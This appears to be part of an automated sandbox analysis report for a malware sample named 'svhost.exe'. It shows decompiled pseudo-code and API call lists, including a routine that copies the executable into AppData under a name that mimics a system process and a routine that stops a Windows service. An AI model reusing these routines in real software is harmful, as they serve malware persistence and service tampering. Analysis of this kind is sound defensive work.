                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CountDependentEnumServicesTick
                                      • String ID: H$H
                                      • API String ID: 2646064813-2010421380
                                      • Opcode ID: c1b24a9a97dab8c8711eda85513393a7a94598a863fd3c70ee7554709ef61efc
                                      • Instruction ID: b7dc99222646b7b6ff79ec6bd3e42cf5935fdb68a4fa2507ef2653db12457009
                                      • Opcode Fuzzy Hash: c1b24a9a97dab8c8711eda85513393a7a94598a863fd3c70ee7554709ef61efc
                                      • Instruction Fuzzy Hash: 31516CB1E85208DFDB10CFE4E849BEEBBB4FB08384F10912AE516B7281D7759846CB51
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00E63800 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 194COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 93%
                                      			E00E63800(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				signed int _v8;
				char _v16;
				signed int _v20;
				char _v44;
				char _v68;
				char _v72;
				intOrPtr _v76;
				signed int _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				char _v104;
				char _v116;
				char _v128;
				signed int _t98;
				signed int _t99;
				void* _t128;
				signed int _t143;
				void* _t146;
				intOrPtr _t150;
				signed int _t156;
				intOrPtr _t169;
				intOrPtr _t178;
				intOrPtr _t189;
				signed int _t197;
				void* _t202;
				void* _t203;
				signed int _t204;

				_t203 = __esi;
				_t202 = __edi;
				_t146 = __ebx;
				_push(0xffffffff);
				_push(0xec0f10);
				_push( *[fs:0x0]);
				_t98 =  *0xeef074; // 0x221cac15
				_t99 = _t98 ^ _t204;
				_v20 = _t99;
				_push(_t99);
				 *[fs:0x0] =  &_v16;
				_v76 = __ecx;
				_v80 = 0;
				E00E636D0( &_v44);
				_v8 = 0;
				E00E636D0( &_v68);
				_v8 = 1;
				_v92 = _a8;
				_t150 = _v76;
				_t190 =  *(_t150 + 0x48) & 0x000000ff;
				if(( *(_t150 + 0x48) & 0x000000ff) == 0) {
					_v100 = 0;
					_v96 = 0;
					_t189 = _v76;
					_t190 = _v100;
					 *(_t189 + 0x40) = _v100;
					 *((intOrPtr*)(_t189 + 0x44)) = _v96;
				}
				E00E640E0(_t146,  &_v44, _t202, _t203, 8, 0);
				 *(_v76 + 0x4c) = 0;
				while(_a8 != _a12) {
					_v84 = E00E5A440(E00E643A0( &_v44,  &_v104));
					_v88 = E00E61350( *((intOrPtr*)(_v76 + 4)), _v76 + 0x40, _a8, _a12,  &_a8, _v84, E00E57A20( &_v44) + _v84,  &_v72);
					if(_v88 < 0) {
						L22:
						_t169 = _v76;
						_t190 =  *(_t169 + 0x49) & 0x000000ff;
						_t213 =  *(_t169 + 0x49) & 0x000000ff;
						if(( *(_t169 + 0x49) & 0x000000ff) == 0) {
							E00E60E80( &_v128, "bad conversion");
							E00EA0C81( &_v128, 0xeedb3c);
							goto L25;
						} else {
							E00E580A0(_t146, _a4, _t202, _t203, _t213, _v76 + 0x10);
							_v80 = _v80 | 0x00000001;
							_v8 = 0;
							E00E57F50( &_v68);
							_v8 = 0xffffffff;
							E00E57F50( &_v44);
						}
					} else {
						if(_v88 <= 1) {
							__eflags = _v84 - _v72;
							if(_v84 >= _v72) {
								_t128 = E00E57A20( &_v44);
								__eflags = _t128 - 0x10;
								if(_t128 >= 0x10) {
									_t178 = _v76;
									_t190 =  *(_t178 + 0x49) & 0x000000ff;
									__eflags =  *(_t178 + 0x49) & 0x000000ff;
									if(__eflags == 0) {
										E00E60E80( &_v116, "bad conversion");
										E00EA0C81( &_v116, 0xeedb3c);
										goto L16;
									} else {
										E00E580A0(_t146, _a4, _t202, _t203, __eflags, _v76 + 0x10);
										_v80 = _v80 | 0x00000001;
										_v8 = 0;
										E00E57F50( &_v68);
										_v8 = 0xffffffff;
										E00E57F50( &_v44);
									}
								} else {
									E00E640E0(_t146,  &_v44, _t202, _t203, 8, 0);
									goto L16;
								}
							} else {
								asm("lfence");
								E00E598A0( &_v68, _t202, _t203, _v84, _v72 - _v84);
								L16:
								goto L25;
							}
						} else {
							if(_v88 == 3) {
								while(1) {
									__eflags = _a8 - _a12;
									if(_a8 == _a12) {
										break;
									}
									E00E633C0(_t146,  &_v68, _t202, _t203,  *_a8 & 0x000000ff);
									_t143 = _a8 + 2;
									__eflags = _t143;
									_a8 = _t143;
								}
								L25:
								_t197 = _a8 - _v92;
								__eflags = _t197;
								_t190 = _t197 >> 1;
								 *(_v76 + 0x4c) = _t197 >> 1;
								continue;
							} else {
								goto L22;
							}
						}
					}
					L27:
					 *[fs:0x0] = _v16;
					return E00E89A35(_t146, _v20 ^ _t204, _t190, _t202, _t203);
				}
				E00E57F70(_a4,  &_v68);
				_t156 = _v80 | 0x00000001;
				__eflags = _t156;
				_v80 = _t156;
				_v8 = 0;
				E00E57F50( &_v68);
				_v8 = 0xffffffff;
				E00E57F50( &_v44);
				goto L27;
			}

































                                      0x00e63800
                                      0x00e63800
                                      0x00e63800
                                      0x00e63803
                                      0x00e63805
                                      0x00e63810
                                      0x00e63814
                                      0x00e63819
                                      0x00e6381b
                                      0x00e6381e
                                      0x00e63822
                                      0x00e63828
                                      0x00e6382b
                                      0x00e63835
                                      0x00e6383a
                                      0x00e63844
                                      0x00e63849
                                      0x00e63850
                                      0x00e63853
                                      0x00e63856
                                      0x00e6385c
                                      0x00e63860
                                      0x00e63863
                                      0x00e63866
                                      0x00e63869
                                      0x00e6386c
                                      0x00e63872
                                      0x00e63872
                                      0x00e6387c
                                      0x00e63884
                                      0x00e6389b
                                      0x00e638ba
                                      0x00e638ef
                                      0x00e638f6
                                      0x00e639da
                                      0x00e639da
                                      0x00e639dd
                                      0x00e639e1
                                      0x00e639e3
                                      0x00e63a27
                                      0x00e63a35
                                      0x00000000
                                      0x00e639e5
                                      0x00e639ef
                                      0x00e639fa
                                      0x00e639fd
                                      0x00e63a04
                                      0x00e63a09
                                      0x00e63a13
                                      0x00e63a18
                                      0x00e638fc
                                      0x00e63900
                                      0x00e63914
                                      0x00e63917
                                      0x00e63934
                                      0x00e63939
                                      0x00e6393c
                                      0x00e6394c
                                      0x00e6394f
                                      0x00e63953
                                      0x00e63955
                                      0x00e6399c
                                      0x00e639aa
                                      0x00000000
                                      0x00e63957
                                      0x00e63961
                                      0x00e6396c
                                      0x00e6396f
                                      0x00e63976
                                      0x00e6397b
                                      0x00e63985
                                      0x00e6398a
                                      0x00e6393e
                                      0x00e63945
                                      0x00000000
                                      0x00e63945
                                      0x00e63919
                                      0x00e63919
                                      0x00e6392a
                                      0x00e639af
                                      0x00000000
                                      0x00e639af
                                      0x00e63902
                                      0x00e63906
                                      0x00e639bf
                                      0x00e639c2
                                      0x00e639c5
                                      0x00000000
                                      0x00000000
                                      0x00e639d1
                                      0x00e639b9
                                      0x00e639b9
                                      0x00e639bc
                                      0x00e639bc
                                      0x00e63a3a
                                      0x00e63890
                                      0x00e63890
                                      0x00e63893
                                      0x00e63898
                                      0x00000000
                                      0x00e6390c
                                      0x00000000
                                      0x00e6390c
                                      0x00e63906
                                      0x00e63900
                                      0x00e63a72
                                      0x00e63a75
                                      0x00e63a8a
                                      0x00e63a8a
                                      0x00e63a46
                                      0x00e63a4e
                                      0x00e63a4e
                                      0x00e63a51
                                      0x00e63a54
                                      0x00e63a5b
                                      0x00e63a60
                                      0x00e63a6a
                                      0x00000000

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: task$codecvt
                                      • String ID: bad conversion
                                      • API String ID: 882727733-2629740042
                                      • Opcode ID: dc15963f822a41aec350897b5aba4ed9121416ca2312d5dc164df7aa2ee232de
                                      • Instruction ID: ba50178927212bec6fef5a99646830d630e3ad088cda3c977a63ca731996749c
                                      • Opcode Fuzzy Hash: dc15963f822a41aec350897b5aba4ed9121416ca2312d5dc164df7aa2ee232de
                                      • Instruction Fuzzy Hash: C6818C31A44248DFCB08DFA4D891AEEBBB1FF44354F14951DE416BB285DB70AA0ACF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00E6ED00 Relevance: 21.1, APIs: 14, Instructions: 149servicesleepCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 77%
                                      			E00E6ED00(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, intOrPtr _a4, long _a8) {
				signed int _v8;
				short* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				struct _SERVICE_STATUS _v48;
				char _v49;
				void* _v56;
				long _v60;
				void* _v64;
				long _v68;
				intOrPtr _v72;
				signed int _t63;
				short** _t74;
				short** _t81;
				short** _t86;
				void* _t89;
				void* _t111;
				void* _t112;
				signed int _t113;

				_t112 = __esi;
				_t111 = __edi;
				_t89 = __ebx;
				_t63 =  *0xeef074; // 0x221cac15
				_v8 = _t63 ^ _t113;
				_v72 = __ecx;
				_v49 = 0;
				_v68 = GetTickCount();
				if((E00E579A0(_a4) & 0x000000ff) != 0) {
					L27:
					return E00E89A35(_t89, _v8 ^ _t113, _t104, _t111, _t112);
				}
				_v64 = OpenSCManagerW(0, 0, 0xf003f);
				if(_v64 == 0) {
					goto L27;
				}
				_v56 = OpenServiceW(_v64, E00E57A40(), 0x2c);
				if(_v56 == 0) {
					L26:
					CloseServiceHandle(_v64);
					goto L27;
				}
				_v48 = 0;
				_v44 = 0;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v28 = 0;
				_v24 = 0;
				_v20 = 0;
				_v16 = 0;
				_v12 = 0;
				_t74 =  &_v12;
				_t104 = _v56;
				__imp__QueryServiceStatusEx(_v56, 0,  &_v48, 0x24, _t74);
				if(_t74 == 0 || _v44 == 1) {
					L25:
					CloseServiceHandle(_v56);
					goto L26;
				} else {
					while(_v44 == 3) {
						_v60 = _v24 / 0xa;
						if(_v60 >= 0x3e8) {
							if(_v60 > 0x2710) {
								_v60 = 0x2710;
							}
						} else {
							_v60 = 0x3e8;
						}
						Sleep(_v60);
						_t86 =  &_v12;
						__imp__QueryServiceStatusEx(_v56, 0,  &_v48, 0x24, _t86);
						if(_t86 != 0) {
							if(_v44 != 1) {
								if(GetTickCount() - _v68 <= _a8) {
									continue;
								}
								break;
							}
						} else {
						}
						break;
					}
					_t104 = _v64;
					E00E6EF60(_v72, _v64, _v64, _v56, _a8);
					if(ControlService(_v56, 1,  &_v48) == 0) {
						goto L25;
					}
					while(_v44 != 1) {
						Sleep(_a8);
						_t81 =  &_v12;
						_t104 = _v56;
						__imp__QueryServiceStatusEx(_v56, 0,  &_v48, 0x24, _t81);
						if(_t81 == 0) {
							L24:
							continue;
						}
						if(_v44 != 1) {
							if(GetTickCount() - _v68 <= _a8) {
								goto L24;
							}
							goto L25;
						}
						_v49 = 1;
						goto L25;
					}
					goto L25;
				}
			}




























                                      0x00e6ed00
                                      0x00e6ed00
                                      0x00e6ed00
                                      0x00e6ed06
                                      0x00e6ed0d
                                      0x00e6ed10
                                      0x00e6ed13
                                      0x00e6ed1d
                                      0x00e6ed2d
                                      0x00e6eeb8
                                      0x00e6eec8
                                      0x00e6eec8
                                      0x00e6ed42
                                      0x00e6ed49
                                      0x00000000
                                      0x00000000
                                      0x00e6ed64
                                      0x00e6ed6b
                                      0x00e6eeae
                                      0x00e6eeb2
                                      0x00000000
                                      0x00e6eeb2
                                      0x00e6ed73
                                      0x00e6ed76
                                      0x00e6ed79
                                      0x00e6ed7c
                                      0x00e6ed7f
                                      0x00e6ed82
                                      0x00e6ed85
                                      0x00e6ed88
                                      0x00e6ed8b
                                      0x00e6ed8e
                                      0x00e6ed95
                                      0x00e6eda1
                                      0x00e6eda5
                                      0x00e6edad
                                      0x00e6eea4
                                      0x00e6eea8
                                      0x00000000
                                      0x00e6edbd
                                      0x00e6edbd
                                      0x00e6edcf
                                      0x00e6edd9
                                      0x00e6edeb
                                      0x00e6eded
                                      0x00e6eded
                                      0x00e6eddb
                                      0x00e6eddb
                                      0x00e6eddb
                                      0x00e6edf8
                                      0x00e6edfe
                                      0x00e6ee0e
                                      0x00e6ee16
                                      0x00e6ee1e
                                      0x00e6ee2e
                                      0x00000000
                                      0x00e6ee32
                                      0x00000000
                                      0x00e6ee30
                                      0x00000000
                                      0x00e6ee18
                                      0x00000000
                                      0x00e6ee16
                                      0x00e6ee3c
                                      0x00e6ee43
                                      0x00e6ee5a
                                      0x00000000
                                      0x00000000
                                      0x00e6ee5c
                                      0x00e6ee66
                                      0x00e6ee6c
                                      0x00e6ee78
                                      0x00e6ee7c
                                      0x00e6ee84
                                      0x00e6eea2
                                      0x00000000
                                      0x00e6eea2
                                      0x00e6ee8a
                                      0x00e6ee9e
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00e6eea0
                                      0x00e6ee8c
                                      0x00000000
                                      0x00e6ee8c
                                      0x00000000
                                      0x00e6ee5c

                                      APIs
                                      • GetTickCount.KERNEL32 ref: 00E6ED17
                                      • std::ios_base::good.LIBCPMTD ref: 00E6ED23
                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F), ref: 00E6ED3C
                                      • OpenServiceW.ADVAPI32(00000000,00000000,0000002C), ref: 00E6ED5E
                                      • QueryServiceStatusEx.ADVAPI32(00000000,00000000,?,00000024,00000000), ref: 00E6EDA5
                                      • Sleep.KERNEL32(00002710), ref: 00E6EDF8
                                      • QueryServiceStatusEx.ADVAPI32(00000000,00000000,?,00000024,00000000), ref: 00E6EE0E
                                      • GetTickCount.KERNEL32 ref: 00E6EE22
                                      • ControlService.ADVAPI32(00000000,00000001,?,00000000,00000000,?), ref: 00E6EE52
                                      • Sleep.KERNEL32(?), ref: 00E6EE66
                                      • QueryServiceStatusEx.ADVAPI32(00000000,00000000,?,00000024,00000000), ref: 00E6EE7C
                                      • GetTickCount.KERNEL32 ref: 00E6EE92
                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 00E6EEA8
                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 00E6EEB2
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Service$CountQueryStatusTick$CloseHandleOpenSleep$ControlManagerstd::ios_base::good
                                      • String ID:
                                      • API String ID: 3349164940-0
                                      • Opcode ID: 6c9749ca940ce5f0cb3db6f82d0b0790793c915f457115bceba91ebb98880955
                                      • Instruction ID: 9c0677883d808b177eb619e54f38fd8084e9bc31f33b7ffa122c15e44227fb4e
                                      • Opcode Fuzzy Hash: 6c9749ca940ce5f0cb3db6f82d0b0790793c915f457115bceba91ebb98880955
                                      • Instruction Fuzzy Hash: 005171B4D40208EFDB14DFA9E989BEDBBB4AF48344F10902AF505B72D0D7329945CB22
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00EB8591 Relevance: 19.6, APIs: 13, Instructions: 113COMMONLIBRARYCODE
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00EB8591(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0xeef250) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E00EB051F(_t46);
							E00EB783B( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E00EB051F(_t47);
							E00EB7CF0( *((intOrPtr*)(_t74 + 0x88)));
						}
						E00EB051F( *((intOrPtr*)(_t74 + 0x7c)));
						E00EB051F( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E00EB051F( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E00EB051F( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E00EB051F( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E00EB051F( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E00EB8702( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0xeef388) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E00EB051F(_t31);
							E00EB051F( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E00EB051F(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E00EB051F(_t74);
			}















                                      0x00eb8599
                                      0x00eb859d
                                      0x00eb85a5
                                      0x00eb85ae
                                      0x00eb85b3
                                      0x00eb85ba
                                      0x00eb85c2
                                      0x00eb85ca
                                      0x00eb85d5
                                      0x00eb85db
                                      0x00eb85dc
                                      0x00eb85e4
                                      0x00eb85ec
                                      0x00eb85f7
                                      0x00eb85fd
                                      0x00eb8601
                                      0x00eb860c
                                      0x00eb8612
                                      0x00eb85b3
                                      0x00eb8613
                                      0x00eb861b
                                      0x00eb862e
                                      0x00eb8641
                                      0x00eb864f
                                      0x00eb865a
                                      0x00eb865f
                                      0x00eb8668
                                      0x00eb8670
                                      0x00eb8671
                                      0x00eb8677
                                      0x00eb867a
                                      0x00eb867d
                                      0x00eb8684
                                      0x00eb8686
                                      0x00eb868a
                                      0x00eb8692
                                      0x00eb8699
                                      0x00eb869f
                                      0x00eb86a0
                                      0x00eb86a0
                                      0x00eb86a7
                                      0x00eb86a9
                                      0x00eb86ae
                                      0x00eb86b6
                                      0x00eb86bb
                                      0x00eb86bc
                                      0x00eb86bc
                                      0x00eb86bf
                                      0x00eb86c2
                                      0x00eb86c5
                                      0x00eb86c8
                                      0x00eb86c8
                                      0x00eb86d8

                                      APIs
                                      • ___free_lconv_mon.LIBCMT ref: 00EB85D5
                                        • Part of subcall function 00EB783B: _free.LIBCMT ref: 00EB7858
                                        • Part of subcall function 00EB783B: _free.LIBCMT ref: 00EB786A
                                        • Part of subcall function 00EB783B: _free.LIBCMT ref: 00EB787C
                                        • Part of subcall function 00EB783B: _free.LIBCMT ref: 00EB788E
                                        • Part of subcall function 00EB783B: _free.LIBCMT ref: 00EB78A0
                                        • Part of subcall function 00EB783B: _free.LIBCMT ref: 00EB78B2
                                        • Part of subcall function 00EB783B: _free.LIBCMT ref: 00EB78C4
                                        • Part of subcall function 00EB783B: _free.LIBCMT ref: 00EB78D6
                                        • Part of subcall function 00EB783B: _free.LIBCMT ref: 00EB78E8
                                        • Part of subcall function 00EB783B: _free.LIBCMT ref: 00EB78FA
                                        • Part of subcall function 00EB783B: _free.LIBCMT ref: 00EB790C
                                        • Part of subcall function 00EB783B: _free.LIBCMT ref: 00EB791E
                                        • Part of subcall function 00EB783B: _free.LIBCMT ref: 00EB7930
                                      • _free.LIBCMT ref: 00EB85CA
                                        • Part of subcall function 00EB051F: HeapFree.KERNEL32(00000000,00000000,?,00EB7F92,?,00000000,?,?,?,00EB8235,?,00000007,?,?,00EB8728,?), ref: 00EB0535
                                        • Part of subcall function 00EB051F: GetLastError.KERNEL32(?,?,00EB7F92,?,00000000,?,?,?,00EB8235,?,00000007,?,?,00EB8728,?,?), ref: 00EB0547
                                      • _free.LIBCMT ref: 00EB85EC
                                      • _free.LIBCMT ref: 00EB8601
                                      • _free.LIBCMT ref: 00EB860C
                                      • _free.LIBCMT ref: 00EB862E
                                      • _free.LIBCMT ref: 00EB8641
                                      • _free.LIBCMT ref: 00EB864F
                                      • _free.LIBCMT ref: 00EB865A
                                      • _free.LIBCMT ref: 00EB8692
                                      • _free.LIBCMT ref: 00EB8699
                                      • _free.LIBCMT ref: 00EB86B6
                                      • _free.LIBCMT ref: 00EB86CE
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                      • String ID:
                                      • API String ID: 161543041-0
                                      • Opcode ID: 70c6e60eec8ae7a5b1b9867070f2407dc3f47e72e21cf8462ac9b5e92e7911eb
                                      • Instruction ID: cb00d80d086d373362d19e21a0004707d4e6862889d6d18765ca58e89a21a395
                                      • Opcode Fuzzy Hash: 70c6e60eec8ae7a5b1b9867070f2407dc3f47e72e21cf8462ac9b5e92e7911eb
                                      • Instruction Fuzzy Hash: 3A3157716012059FEB31AA38DE45BDB77EAAF40314F106429E585FB696DF74ED80CB20
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00E70340 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 88fileCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 87%
                                      			E00E70340(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				char _v16;
				signed int _v20;
				char _v44;
				char _v68;
				intOrPtr _v72;
				char _v96;
				signed int _t30;
				signed int _t31;
				signed char _t37;
				WCHAR* _t49;
				signed int _t85;

				_t84 = __esi;
				_t83 = __edi;
				_t57 = __ebx;
				_push(0xffffffff);
				_push(0xec1960);
				_push( *[fs:0x0]);
				_t30 =  *0xeef074; // 0x221cac15
				_t31 = _t30 ^ _t85;
				_v20 = _t31;
				_push(_t31);
				 *[fs:0x0] =  &_v16;
				_v72 = __ecx;
				E00E57CD0(__ebx,  &_v96, __edi, __esi, __eflags, L"AppData");
				E00E70540(__ebx, _v72, __edi, __esi,  &_v44,  &_v96);
				E00E57B40( &_v96);
				_t37 = E00E579A0( &_v44);
				_t82 = _t37 & 0x000000ff;
				_t90 = _t37 & 0x000000ff;
				if((_t37 & 0x000000ff) != 0) {
					L5:
					E00E57CD0(_t57, _a4, _t83, _t84, __eflags, 0xee4df0);
					E00E57B40( &_v44);
				} else {
					E00E70470(__ebx, _v72, _t82, __edi, __esi, _t90,  &_v68);
					if((E00E579A0( &_v68) & 0x000000ff) != 0) {
						L4:
						E00E57B40( &_v68);
						goto L5;
					} else {
						E00E66920( &_v44, "\\");
						E00E66920( &_v44, L"svhost");
						E00E66920( &_v44, L".exe");
						_t49 = E00E57A40();
						if(CopyFileW(E00E57A40(), _t49, 0) == 0) {
							goto L4;
						} else {
							_t82 =  &_v44;
							E00E57BA0(_a4, E00E51650( &_v44));
							E00E57B40( &_v68);
							E00E57B40( &_v44);
						}
					}
				}
				 *[fs:0x0] = _v16;
				return E00E89A35(_t57, _v20 ^ _t85, _t82, _t83, _t84);
			}














                                      0x00e70340
                                      0x00e70340
                                      0x00e70340
                                      0x00e70343
                                      0x00e70345
                                      0x00e70350
                                      0x00e70354
                                      0x00e70359
                                      0x00e7035b
                                      0x00e7035e
                                      0x00e70362
                                      0x00e70368
                                      0x00e70373
                                      0x00e70383
                                      0x00e7038b
                                      0x00e70393
                                      0x00e70398
                                      0x00e7039b
                                      0x00e7039d
                                      0x00e70435
                                      0x00e7043d
                                      0x00e70445
                                      0x00e703a3
                                      0x00e703aa
                                      0x00e703bc
                                      0x00e7042d
                                      0x00e70430
                                      0x00000000
                                      0x00e703be
                                      0x00e703c6
                                      0x00e703d3
                                      0x00e703e0
                                      0x00e703ea
                                      0x00e70401
                                      0x00000000
                                      0x00e70403
                                      0x00e70403
                                      0x00e70413
                                      0x00e7041b
                                      0x00e70423
                                      0x00e70428
                                      0x00e70401
                                      0x00e703bc
                                      0x00e70450
                                      0x00e70465

                                      APIs
                                        • Part of subcall function 00E70540: std::ios_base::good.LIBCPMTD ref: 00E7056E
                                        • Part of subcall function 00E70540: GetEnvironmentVariableW.KERNEL32(00000000,00000000,00000000,00000000,00000104,00000000,221CAC15,?,00EC0ED0,000000FF,?,00E70388,?,?,AppData,221CAC15), ref: 00E705A6
                                        • Part of subcall function 00E70540: task.LIBCPMTD ref: 00E705D5
                                      • task.LIBCPMTD ref: 00E7038B
                                      • std::ios_base::good.LIBCPMTD ref: 00E70393
                                      • task.LIBCPMTD ref: 00E70445
                                        • Part of subcall function 00E70470: GetModuleFileNameW.KERNEL32(00000000,00000000,00000000,00000000,00000104,00000000,221CAC15,00EC0ED0,000000FF,?,00E703AF,?,?,?,AppData,221CAC15), ref: 00E704C0
                                        • Part of subcall function 00E70470: task.LIBCPMTD ref: 00E704F8
                                      • std::ios_base::good.LIBCPMTD ref: 00E703B2
                                      • CopyFileW.KERNEL32(00000000,00000000,00000000,.exe,svhost,00EE4DD0,?,?,?,AppData,221CAC15), ref: 00E703F9
                                      • task.LIBCPMTD ref: 00E7041B
                                      • task.LIBCPMTD ref: 00E70423
                                      • task.LIBCPMTD ref: 00E70430
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: task$std::ios_base::good$File$CopyEnvironmentModuleNameVariable
                                      • String ID: .exe$AppData$svhost
                                      • API String ID: 1170940147-767749533
